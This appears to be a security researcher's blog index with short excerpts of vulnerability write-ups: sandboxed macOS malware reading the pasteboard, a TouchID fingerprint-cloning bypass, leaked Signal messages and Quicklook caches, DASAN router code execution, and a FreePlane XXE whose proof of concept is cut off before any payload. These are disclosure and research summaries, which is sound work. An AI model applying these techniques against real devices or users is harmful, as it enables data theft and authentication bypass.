All Posts

Dissecting Logitech Options on macOS

Some time ago, I bought Logitech MX Master wireless mouse to be used with my macs. And here the story begins… Since this mouse has extra buttons I wanted to assign them my custom actions. As I read in Logitech docs I had to download driver called “Logitech Options”. So I did! Kudos section First of all I wanted to thank @Disconnect3d for helping me with reversing part. The second Kudos belongs to @Taviso who discovered similar issue on Windows simultaneously and reported it to Logitech team.

Sandboxed malware may control your pasteboard

TLDR Sandbox implemented in macOS does not cover pasteboard. That blog post shows that you are able to create fully sandboxed malware (that may pass Apple’s review, bypassed many times in the past) stealing & modifying pasteboard values. What sandbox is? App Sandbox is an access control technology provided in macOS, enforced at the kernel level. It is designed to contain damage to the system and the user’s data if an app becomes compromised.

Your Signal messages can leak via locked screen on macOS

If you are a security aware person, you probably use one of the secure messengers. 😏 And maybe to improve your comfort you installed its desktop version on your mac? Sometimes we leave our computer unattended when we go to make a coffee or we need to talk with somebody in the other room. Since we are security aware, we always lock our screens (you do that, right?). But what if all messages sent to you will be visible on your locked mac?

Clone your finger - bypassing TouchID

In this short blog post I will present you why alphanumeric password is much more secure than using biometrics. At my home, as a totally n00b, I was able to clone my finger that bypassed TouchID. To be honest in my case, effectiveness was about 10%-15% - but like I wrote before, it was my first time and I didn’t have any professional tools. Before I start, I want to credit Łukasz Bobrek & Paweł Kuryłowicz from SecuRing that showed me their research.

My thoughts after AppSec EU

Hi dear readers! This year I attended my first OWASP AppSec EU both as an attendee and speaker. I really enjoyed the conference, the community-driven presentations and 3 tracks (DevOps, Developer, CISO, Hacker). Because of my interests I decided to follow the Hacker track. Man in contacts The first presentation that I attended on AppSec was Man in contacts by Jeremy Matos and Laureline David. The main idea was to create malicious app that has access to your contacts (you actually give the permissions) and then all your contacts are drained to the malicious C&C.

Your encrypted photos revealed in macOS cache

Quicklook is a super cool mechanism allowing you to quick check file contents without opening it in specialized application. When you press the space bar on for instance *xlsx file, you can see following preview without having MS Excel installed. While reading *OS Internals Volume I (that I highly recommend btw) I stopped on Quicklook chapter. I found out that Quicklook registers com.apple.quicklook.ThumbnailsAgent XPC service that is responsible for ==creating thumbnails== database and storing it in /var/folders/…/C/com.

Authenticated Code Execution in DASAN routers

Before I start describing details you have to know that this post is published on Responsible Disclosure terms. I sent full report with all the findings to DASAN on 24th October 2017. We have been talking about these vulnerabilities for a long time and one day they just stopped contacting me anymore (even when I warned them that I want to disclose this). Today is 26th April 2018, so it’s over half year after DASAN has been informed.

Story about hacking security conference and their funny revenge

Not so long time ago I submitted my presentation proposal on CONFidence’s Call For Papers. CONFidence is one of the best European IT Sec conference that I love to attend due to very good presentations quality and hackish^H^H atmosphere ;-) This year I decided to actively attend as a speaker with my presentation about pentesting iOS apps using jailed iDevice. I sent my proposal and when I received the approval, I visited the conference’s website in order to check if I’m included in the speakers list for sure (in SecuRing it’s common to prank your colleagues like for instance sending emails from fake server, haha).

'The biggest' *OS problem in 2018

It’s March 2018 when I’m writing this post. From day to day, Apple’s security is improved - we have Kernel Patch Protection, Secure Enclave Processor (now even on macOS with Touch Bar), GateKeeper and many other security features. On the other hand, only in the last half of the year some trivial bugs were found that led to password disclosure. It’s seems like password leaks may be currently the most serious, from PR perspective, *OS problem.

FreePlane <= 1.5.9 XXE

What FreePlane is? FreePlane is an open-source application intended for creating mind maps. Vulnerability descripton: FreePlane is Java-based app that loads its mind maps that are stored as a simple XML files. The parser allowed to expand external entities that caused this vulnerability. Results: When victim opens maliciously crafted mind map, any accessible by Java file can be sent to the attacker. Proof of concept: Malicious mindmap: <map version="freeplane 1.